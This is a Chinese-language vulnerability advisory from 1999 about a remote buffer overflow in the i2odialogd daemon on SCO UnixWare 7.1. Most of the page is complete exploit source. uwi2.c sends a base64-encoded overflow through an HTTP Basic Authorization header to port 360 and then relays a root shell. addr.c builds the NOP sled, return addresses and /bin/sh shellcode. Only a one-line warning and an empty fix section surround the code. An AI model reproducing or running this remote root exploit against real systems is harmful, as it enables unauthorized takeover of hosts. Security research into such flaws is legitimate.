发布日期：1999-12-22
更新日期：1999-12-22

受影响系统：

SCO Unixware 7.1

描述：

---

i20dialogd是一个为控制i20子系统提供前端处理的进程。在缺省情况下，在SCO Unixware中以root身份运行。在它的鉴别机制中存在一个严重的缓存溢出漏洞。username/passwd缓存设为固定长度(88个字符）且没有进行边界检查，因此进行溢出处理后，可以造成执行任意代码。值得注意的是在溢出代码发送到服务器前必须进行编码（base64）处理。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/* uwi2.c
*
* i2o remote root exploit for UnixWare 7.1
* compile on UnixWare with cc -o uwi2 uwi2.c -lsocket -lnsl
* ./uwi2 <hostname> =
* The hard-coded RET address is 0x8047d4c =
*
* To either replace the shellcode or change the offset you must =
* first craft a program which outputs, in this order:
* - 92 bytes of your RET address (EIP starts at 89)
* - NOPs, as many as you would like
* - your shellcode
* - the character ":"
* - any character, maybe "A", as I''ve done below
* - NULL
* When printf()''ing this string, do NOT append a \newline!
* You then pipe the output of this program to a MIME encoder (mimencode =
* on UnixWare).  You then take the output of this program and paste it
* where I''ve marked below.
*
* Brock Tellier btellier@usa.net
*
*/
  
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>
  
#define BUFLEN 10000
  
/* since we''re overflowing an Authenticate: Basic username */
/* our exploit code must be base64(MIME) encoded */
  
char *mimecode =
  
/**** CHANGE THIS PART OF THE EXPLOIT STRING ****/
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQTH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xteMduJXgeJXgyIXhExwLA7jX4HiflT=
"
"UVZW6xDo4P///y9iaW4vc2iqqqqqmqqqqqoHqpCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkDpB";
/************************************************/
char *auth=
"GET / HTTP/1.0\r\n"
"Host: localhost:360\r\n"
"Accept: text/html\r\n"
"Accept-Encoding: gzip, compress\r\n"
"Accept-Language: en\r\n"
"Negotiate: trans\r\n"
"User-Agent: xnec\r\n"
"Authorization: Basic";

char buf[BUFLEN];
char sockbuf[BUFLEN];
char c;
int offset=0;
int i, ascii,num;
int i2oport = 360;
int sock;
int addr = 0x80474b4;
  
struct  sockaddr_in sock_a;
struct  hostent *host;
  
void main (int argc, char *argv[]) {
  
if(argc < 2) {
   fprintf(stderr, "Error:Usage: %s <hostname> \n", argv[0]);
   exit(0);
  }
if(argc == 3) offset=atoi(argv[2]);

sprintf(buf, "%s %s \r\n\r\n", auth, mimecode);
buf[BUFLEN - 1] = 0;

fprintf(stderr, "i2odialogd remote exploit for UnixWare 7.1\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
  
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
    perror("gethostbyname");
    exit(-1);
  }
  
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
    perror("create socket");
    exit(-1);
  }
  
sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(i2oport);
  
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
  
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
    perror("create connect");
    exit(-1);
  }
  
  fflush(stdout);

  // write exploit
  write(sock,buf,strlen(buf));
  
  //begin read
  while(1) {
    fd_set input;
    FD_SET(0,&input);
    FD_SET(sock,&input);
    select(sock+1,&input,NULL,NULL,NULL);

    if(FD_ISSET(sock,&input)) {
      num=read(sock,sockbuf,BUFLEN);
      write(1,sockbuf,num);
     }
  
     if(FD_ISSET(0,&input))
     write(sock,sockbuf,read(0,sockbuf,BUFLEN));
  }
}
  
------
  
--- addr.c ---
  
/*
* addr.c - Add-on for the UnixWare 7.1 remote root exploit in i2dialogd
* simply MIME encode the output of this program and put into the
* appropriate place in uwi2.c
*
* Usage: cc -o addr addr.c; ./addr <offset> <size>
*
* Brock Tellier btellier@usa.net
*/
  
#include <stdio.h>
#define NOP 0x90
  
char scoshell[]=
  
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
  
void main(int argc, char *argv[]) {
  
long addr;
char buf[2000];
  
int i;
int offset;
int size = 400;
  
if (argc > 1) offset = atoi(argv[1]);
if (argc > 2) size = atoi(argv[2]);
  
addr=0x8046000 + offset;
memset(buf, NOP, size);
  
for(i=60;i<100;i+=4)*(int *)&buf[i]=addr;
for(i = 0; i < strlen(scoshell); i++)
  
   buf[i+300] = scoshell[i];
  
buf[size - 3] = '':'';
buf[size - 2] = ''A'';
buf[size - 1] = 0;
  
fprintf(stderr, "using addr 0x%x with offset %d \n", addr, offset);
fprintf(stderr, "mime-encode the stdoutput!\n");
  
printf(buf);
  
}


建议：

---

暂无

浏览次数：7353
严重程度：0（网友投票）